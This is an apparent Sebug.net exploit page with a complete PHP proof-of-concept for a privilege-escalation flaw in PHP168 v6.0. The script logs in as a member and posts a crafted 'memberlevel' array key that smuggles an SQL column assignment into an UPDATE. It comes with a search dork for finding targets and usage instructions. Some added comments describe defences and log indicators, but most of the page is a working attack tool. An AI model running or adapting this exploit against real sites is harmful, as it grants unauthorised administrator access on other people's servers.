Php168 v6 权限提升漏洞

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/php
<?php
// Proof-of-concept published for PHP168 v6.0. Given valid credentials for an
// ordinary member account it logs in, then posts a crafted form to
// member/homepage.php and reports whether the marker string came back.
//
// NOTE(review): the server-side code is not shown on this page. The request
// shape suggests that the array keys of `memberlevel` reach an SQL UPDATE
// without validation, so a key can carry an extra column assignment --
// confirm against the PHP168 source before relying on this description.
// Defensive takeaways: accept only integer keys for array-valued parameters,
// build the statement with bound parameters, and treat POSTs to
// member/homepage.php whose `memberlevel[...]` key contains ',', '=' or a hex
// literal as suspicious in web-server or WAF logs.

print_r('
+---------------------------------------------------------------------------+
Php168 v6.0 update user access exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V6.0"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
// Four positional arguments are required; otherwise print usage and stop.
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass
host:      target server (ip/hostname)
path:      path to php168
user:      login username
pass:      login password
Example:
php '.$argv[0].' localhost /php168/ ryat 123456
+---------------------------------------------------------------------------+
');
    exit;
}

// 7 = E_ERROR | E_WARNING | E_PARSE; notices are hidden.
error_reporting(7);
// Remove the script time limit so a slow server does not abort the run.
ini_set('max_execution_time', 0);

// These four values are read by send() through `global`.
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];

// First call: $cookie is still unset, so send() issues the login request.
$resp = send();
// Pull the `passport` cookie out of the login response. Group 1 is the whole
// name=value pair; group 2 is the 1-4 digit number in front of the encoded
// tab (%09), which send() later places in the `uid` query parameter.
preg_match('/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/', $resp, $cookie);

// The second request is made only when a passport cookie was issued. Success
// is judged by the marker 'puret_t' appearing in the response; the literal
// 0x70757265745f74 in the form body is the hex spelling of that same string.
// For responders: a member record whose `introduce` value is 'puret_t' is an
// indicator that this script was run (presumably `introduce` is a member
// profile column -- verify against the schema).
if ($cookie)
    if (strpos(send(), 'puret_t') !== false)
        exit("Expoilt Success!\nYou Are Admin Now!\n");
    else
        exit("Exploit Failed!\n");
else
    exit("Exploit Failed!\n");

/**
 * Build a random alphanumeric string.
 *
 * mt_rand is reseeded from the fractional part of microtime() on every call,
 * so the output is predictable; in this script it only fills a cookie value.
 *
 * @param int $length number of characters to produce (default 8)
 * @return string the generated characters, drawn from A-Z, 0-9 and a-z
 */
function rands($length = 8)
{
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    mt_srand((double)microtime() * 1000000);
    for ($i = 0; $i < $length; $i++)
        $hash .= $chars[mt_rand(0, $max)];

    return $hash;
}

/**
 * Build one raw HTTP/1.1 POST, send it to $host on TCP port 80 and return
 * everything the server sends back (headers and body) as a single string.
 *
 * Which request is built depends on the global $cookie: when it is empty the
 * login form is posted to do/login.php; once the caller's preg_match has
 * filled it, the form is posted to member/homepage.php with the captured
 * cookie attached. All inputs come from globals; the function has no
 * parameters.
 *
 * @return string raw response text
 */
function send()
{
    global $host, $path, $user, $pass, $cookie;

    if ($cookie) {
        // Extend the captured cookie with a `USR` cookie made of a random
        // 8-character value and tab-separated fields. Note this appends to
        // the global on every call. NOTE(review): the meaning of the fields
        // is defined by PHP168 and is not visible on this page.
        $cookie[1] .= ';USR='.rands()."\t31\t\t";
        // Form body. The third key is not a plain index: URL-decoded it reads
        // `3,introduce=0x70757265745f74`, which is the pattern to look for in
        // request logs.
        $cmd = 'memberlevel[8]=1&memberlevel[9]=1&memberlevel[3,introduce%3D0x70757265745f74]=-1';

        $message = "POST ".$path."member/homepage.php?uid=$cookie[2]  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n";
        $message .= "Cookie: ".$cookie[1]."\r\n\r\n";
        $message .= $cmd;
    } else {
        // Ordinary login form post; the credentials are placed in the body
        // exactly as given on the command line, without URL encoding.
        $cmd = "username=$user&password=$pass&step=2";

        $message = "POST ".$path."do/login.php  HTTP/1.1\r\n";
        $message .= "Accept: */*\r\n";
        $message .= "Accept-Language: zh-cn\r\n";
        $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n";
        $message .= "Connection: Close\r\n\r\n";
        $message .= $cmd;
    }

    // Plain-text HTTP on port 80; the request is written in one piece.
    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    // "Connection: Close" was requested, so read until the server closes.
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>